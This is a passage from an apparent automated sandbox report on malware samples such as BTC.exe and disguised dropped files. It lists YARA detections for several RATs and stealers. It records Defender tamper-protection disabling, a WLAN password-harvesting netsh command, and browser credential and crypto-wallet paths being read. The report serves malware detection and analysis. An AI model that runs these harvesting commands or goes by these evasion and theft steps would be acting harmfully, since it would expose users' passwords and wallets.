                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Users\user\AppData\Roaming\Window Security.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Users\user\AppData\Roaming\Window Security.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\Desktop\BTC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 0.2.BTC.exe.2c8fa48.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.0.Cracked.exe.d80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Cracked.exe.310b0a8.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Cracked.exe.310b0a8.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cracked.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: Process Memory Space: Cracked.exe PID: 5524, type: MEMORYSTR
                            Disables Windows Defender Tamper protection
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeRegistry value created: TamperProtection 0
                            Uses netsh to modify the Windows network and firewall settings
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe.0.dr, Windows Security Health Service.exe.3.drBinary or memory string: MSASCui.exe
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe.0.dr, Windows Security Health Service.exe.3.drBinary or memory string: procexp.exe
                            Source: svchost.exe, 00000004.00000002.4463794496.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000005.00000002.4556173792.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4547475087.000000001CE21000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4547475087.000000001CDED000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4537546476.000000001C141000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4455411740.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4537546476.000000001C0F0000.00000004.00000020.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4537546476.000000001C1A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: BTC.exe, 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe.0.dr, Windows Security Health Service.exe.3.drBinary or memory string: MsMpEng.exe
                            Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Rezlt
                            Source: Yara matchFile source: 2.0.crack.exe.440000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.2003529884.0000000000442000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: crack.exe PID: 5972, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\crack.exe, type: DROPPED
                            Yara detected StormKitty Stealer
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: BTC.exe PID: 2796, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Windows Defender Service Host.exe PID: 7140, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Yara detected Vermin Keylogger
                            Source: Yara matchFile source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED
                            Yara detected WorldWind Stealer
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Yara detected XWorm
                            Source: Yara matchFile source: 0.2.BTC.exe.2c80488.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c75848.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.0.Windows Defender Service Host.exe.f60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000000.2009427541.0000000000F62000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: BTC.exe PID: 2796, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Windows Defender Service Host.exe PID: 7140, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe, type: DROPPED
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets
                            Source: svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\keystore
                            Tries to harvest and steal WLAN passwords
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Roaming\update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Roaming\update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Users\user\AppData\Roaming\update.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                            Source: C:\Users\user\AppData\Roaming\update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Users\user\AppData\Roaming\update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Roaming\update.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Roaming\update.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.d0809a.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.d05295.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.Window Security.exe.ce0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Window Security.exe PID: 2680, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Window Security.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected Rezlt
                            Source: Yara matchFile source: 2.0.crack.exe.440000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.2003529884.0000000000442000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: crack.exe PID: 5972, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\crack.exe, type: DROPPED
                            Yara detected StormKitty Stealer
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: 0.2.BTC.exe.2c80488.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.BTC.exe.2c75848.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.0.update.exe.c60000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.0.svchost.exe.5b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: BTC.exe PID: 2796, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1716, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: update.exe PID: 1632, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Windows Defender Service Host.exe PID: 7140, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\update.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                            Yara detected Vermin Keylogger
